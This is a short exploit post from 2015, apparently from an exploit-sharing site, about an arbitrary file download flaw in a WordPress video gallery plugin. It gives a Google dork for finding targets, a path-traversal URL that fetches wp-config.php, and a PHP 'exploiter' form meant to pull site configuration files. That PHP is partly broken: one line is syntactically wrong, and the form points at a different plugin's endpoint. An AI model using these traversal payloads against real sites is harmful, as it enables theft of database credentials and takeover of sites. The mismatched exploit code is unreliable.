facebook facebook twitter rss

Wordpress Video Gallery Arbitrary File Download Vulnerability

Author: AnonJoker , Published: 20-06-2015
# Exploit Title : Wordpress Video Gallery Arbitrary File Download Vulnerability

# Date : 20/06/2015


# Exploit Author : AnonJoker


# Contact : anonjoki@gmail.com | FB.COM/ANONJOKER008


# Category : Web Application Bugs


# Home : Mirrors-Zone.com


# Google Dork : inurl:/wp-content/plugins/contus-video-gallery/hdflvplayer/


# Tested On : Windows | Kali Linux

# Proof of Concept

http://[target]/wp-content/plugins/contus-video-gallery/hdflvplayer/download.php?f=../../../../wp-config.php

*****
Exploit :

/wp-content/plugins/contus-video-gallery/hdflvplayer/download.php?f=../../../../wp-config.php

*****

OR Use MY OWN Exploiter:


<?php
echo "<body bgcolor='#000000' >";
echo 
'<center>';
echo 
'<form method="post">';
echo 
"<h4><font color='white'>www.site.com</font></h4><input type='text' name='target'>";
echo 
'<input type="submit" name="do">';
echo 
'</form>';
echo 
'<body>';
$site $_POST['target'];
$foncution $_POST['do'];
if (isset(
$_POST['do'])) {
   echo 
"<form action='http://{$site}/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php' method='POST'>

 <b>Config</b>:<input type='text' name='_mysite_download_skin' value='../../../../../wp-config.php' placeholder='www.site.com'><br>

<input type='submit' value='Get CFG'>

</form>

</body>"
;
}
echo 
"<h5><font color='white'> AnonJoker | RTH </font></h5>";
echo 
'</center>';
?>

Like us on Facebook :